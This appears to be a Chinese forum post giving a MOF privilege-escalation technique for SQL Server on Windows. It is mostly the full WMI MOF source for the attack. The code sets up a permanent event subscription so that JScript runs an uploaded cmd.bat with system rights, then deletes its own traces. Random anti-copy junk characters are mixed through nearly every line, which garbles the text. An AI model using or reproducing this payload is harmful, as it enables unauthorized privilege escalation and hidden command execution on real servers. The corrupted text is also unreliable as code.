这个sql提权MOF需要运行 system下的文件,不能定义路径。* b6 \: W; v5 V( A2 f
需要将要运行的命令写入到bat上传到system32目录,然后执行。8 V0 e, v, i, H0 o$ G* {
- i" V+ b# X( |6 i
这个sql提权MOF需要运行 system下的文件,不能定义路径。, A5 |' R( f/ g0 ]3 w
需要将要运行的命令写入到bat上传到system32目录,然后执行。- x! S2 [$ B: W/ @
3 H$ g3 y K6 n. ~! h
#pragma: F+ D) h& s/ [* Z8 v# F
namespace("\\\\.\\root\\cimv2")% V. P. k3 O1 i
class8 t& Z! g% @3 }+ y v" B. T
MyClass547
' i4 T" K5 N0 b- k X2 A" \ { [key]% g7 R, w9 s6 M( e2 d- M4 J
string6 z0 H0 O6 a3 h5 W0 Y$ u7 \
Name;- O: O1 J6 b% j4 s0 I! Q$ Z
};) ~/ z+ {* z( n8 A- Z, X4 Y" B
class
8 ?1 e+ l8 v5 S3 L& ^0 X# _ ActiveScriptEventConsumer9 k/ x! ?$ a( H
: __EventConsumer { [key]+ f2 O8 T* P' B, T3 X- K8 l
string8 w5 k* k' X+ B4 e1 l
Name; [not_null]2 ~* b- v( A3 Y/ R2 y
string- V+ m8 m; A% _) K M
ScriptingEngine; string
% U8 x: _. Q6 r+ e, l4 }1 X: I3 V ScriptFileName; [template]' C3 C! ] R' {! P" K2 Y# L
string
?' x% X0 v: Z1 u: Z+ H" w, C ScriptText; uint32 KillTimeout;
3 a, Y: S( o. |& I }; instance of __Win32Provider as $P {2 @$ Q6 @' ] d5 s
Name
$ p- t, A$ d1 f; f =
4 z: x: m/ @) N "ActiveScriptEventConsumer"; CLSID =" }% F) c+ `1 z( Z- h
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";" \% J* I# _7 E$ c, }) t0 G/ a
PerUserInitialization, v% A# w( \5 s4 i% S' c' x
= TRUE;
) G6 F3 o8 g: o$ v" S3 i }; instance of __EventConsumerProviderRegistration { Provider
# S8 d6 S0 B7 Y0 \ = $P; ConsumerClassNames
* f% ?) j6 D, b" s+ r( r8 }5 u5 \ =, b( m& E2 q5 v1 U# K( e6 Y+ M
{"ActiveScriptEventConsumer"};
0 t! w) N5 c: K/ M8 O( D };- d5 Y7 O( k( f: W$ U Y3 y
Instance of ActiveScriptEventConsumer2 _' d" _7 l2 V) L, E
as $cons { Name4 z& J. z0 a" h( S! w" n; n3 h
=+ \: m# h, U; b8 k6 E x
"ASEC"; ScriptingEngine, j H1 V4 F. b) {( S, T
=. U# s) j. r9 G% Q6 g4 E% }
"JScript"; ScriptText
3 v4 R$ g3 S; [& Y$ X2 U* S2 e =
: Y" e8 u) D, T& F- I "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
. D4 M% ~- {/ I) T Instance of ActiveScriptEventConsumer
9 y6 W5 g: v3 ~' a; x' _5 V as $cons2 { Name. \6 Z: z/ {: p6 {
=: y9 E0 P3 n [
"qndASEC"; ScriptingEngine+ X. x1 B$ B, n% K
=( N3 u& b: h$ g5 q' C, ^
"JScript"; ScriptText, V8 M" s1 @( H2 t9 j/ u3 h* Z D
=
7 ^, m0 d% V; Q( C& z3 [ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
; R5 \2 o1 e9 t T O+ l }; instance of __EventFilter as $Filt { Name. x( j G- ?0 l4 Z5 \6 c
=
: n4 z ~3 l6 F! E "instfilt"; Query0 O2 H, a, k" h1 j
=( e5 l* ~% p6 l' w& p; ?. W9 }" e
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
2 i/ w, |2 B2 Z2 U: \1 e =
7 j8 x3 K. f; r* \4 N- @1 T$ @ "WQL"; }; instance of __EventFilter as $Filt2 { Name
5 n# z/ H3 K e# U! m; o [ =5 H6 H: I: D9 g1 ^. X+ {
"qndfilt"; Query
. P9 a$ q. S% G2 ^/ e2 { =
% O& W& a5 R- H( j) l "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
" o/ J1 Z- |$ `* j: x& D$ A% L# | =; Q4 X5 m) T2 I0 M; c; N) I
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
+ n& m( z4 d7 K2 d; x3 z. z: I$ E i = $cons; Filter
6 d$ o0 s5 E3 i = $Filt;: x( i& }1 e& B7 M8 l0 J
}; instance of __FilterToConsumerBinding as $bind2 { Consumer8 S+ C4 @- Q" z g( r& S
= $cons2; Filter2 T) u+ [$ S- [. F! @; F' f& X
= $Filt2;
( _. W. M" {" h, c% P! F }; instance of MyClass547
6 v6 L1 p3 E7 U( c5 ] o. y as $MyClass { Name* w' d! G! t6 Y( b# J7 B
=* X5 l/ D$ o0 o& s" i
"ClassConsumer";0 `, e3 q. ~, o6 p# u: B% j" o" k' Z
}; |